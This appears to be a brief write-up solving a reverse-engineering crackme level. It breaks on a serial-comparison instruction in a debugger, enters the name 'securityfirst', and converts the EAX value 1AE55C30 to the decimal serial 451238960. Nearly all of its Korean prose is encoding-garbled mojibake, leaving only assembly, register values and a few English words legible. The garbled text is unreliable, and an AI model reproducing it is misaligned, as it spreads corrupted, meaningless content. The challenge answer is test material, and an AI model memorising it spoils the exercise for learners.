ÀÎÁõÁß Çϳª¸¦ Åë°ú ÇÒ ¼ö ÀÖ½À´Ï´Ù. ¾Æ·¡ º¸½Ã´Â ºÎºÐÀÌ ¹Ù·Î ¿ì¸®°¡ ÀÔ·ÂÇÑ °ª°ú ½Ã¸®¾ó ¹øÈ£¸¦ ºñ±³ÇÏ´Â ±¸¹®ÀÔ´Ï´Ù. 004016BB |. 3B42 60 CMP EAX,DWORD PTR DS:[EDX+60] ÀÌ·³ ÀÌÁ¦ ÀÌ°÷¿¡¸¸ break¸¦ °É°í ´Ù½Ã ÇÁ·Î±×·¥À» ½ÇÇà½ÃÄÑ ÀÓÀÇÀÇ ¹®ÀÚ¿­°ú Á¤¼ö¸¦ ÀÔ·ÂÇÕ´Ï´Ù. ±×·³ ¿ì¸®°¡ breakÇÑ °÷À¸·Î À̵¿ÇÏ°Ô µÇ´Âµ¥ ¾Æ·§ÂÊ ¹Ú½º¿¡ º¸½Ã¸é EAX¿¡ µé¾î°¡´Â °ªÀÌ ¿ì¸®°¡ ¿øÇÏ´Â ½Ã¸®¾ó ¹øÈ£ÀÔ´Ï´Ù. ÇÏÁö¸¸ ¹®Á¦¿¡¼­ ¿øÇÑ Input Nameµµ ÃæÁ·½ÃÄÑ Áà¾ßÇϴµ¥, ±× ºÎºÐÀº °Ô½ÃÆÇ¿¡ ¹®Á¦¿¡´ëÇÑ °øÁö¸¦ º¸½Ã¸é ¾Ë ¼ö ÀÖ½À´Ï´Ù. -> Name - securityfirst ¿¡ ´ëÇÑ ´äÀ» ±¸ÇϵÇ, ¹ÙÀ̳ʸ®¸¦ ÆÐÄ¡Çϰųª ¸®¹ö½Ì °úÁ¤Áß ·çƾ ¼öÁ¤Àº ºÒ°¡, ÀÖ´Â ±×´ë·Î Ç®¾î¾ß ÇÕ´Ï´Ù. <- Input NameÀÌ securityfirst°¡ µÇ¾î¾ß ÇÕ´Ï´Ù. ±×·³ ´Ù½Ã ½Ã¸®¾ó ºñ±³±¸¹®¿¡ break¸¦ °É°í Input Name¿¡ securityfirst¸¦ ÀÔ·ÂÇÑ µÚ È®ÀÎÇϽøé CMP±¸¹®¿¡ break°¡ °É¸®°Ô µÇ°í ±× ¾Æ·¡ ¹Ú½º¿¡ º¸½Ã¸é, EAX°ªÀÌ ½Ã¸®¾ó ¹øÈ£°¡ µË´Ï´Ù. Stack DS:[0012FEE4]=423A35C7 EAX=1AE55C30 EAXÀÇ °ªÀÎ 1AE55C30¸¦ 10Áø¼ö·Î ¹Ù²Ù¸é µåµð¾î ¿ì¸®°¡ ¿øÇÏ´Â ÃÖÁ¾ÀûÀÎ ´äÀÌ Åº»ýÇϰԵ˴ϴÙ. 1AE55C30 -> 451238960 ±×¸®°í...... Level Clear...!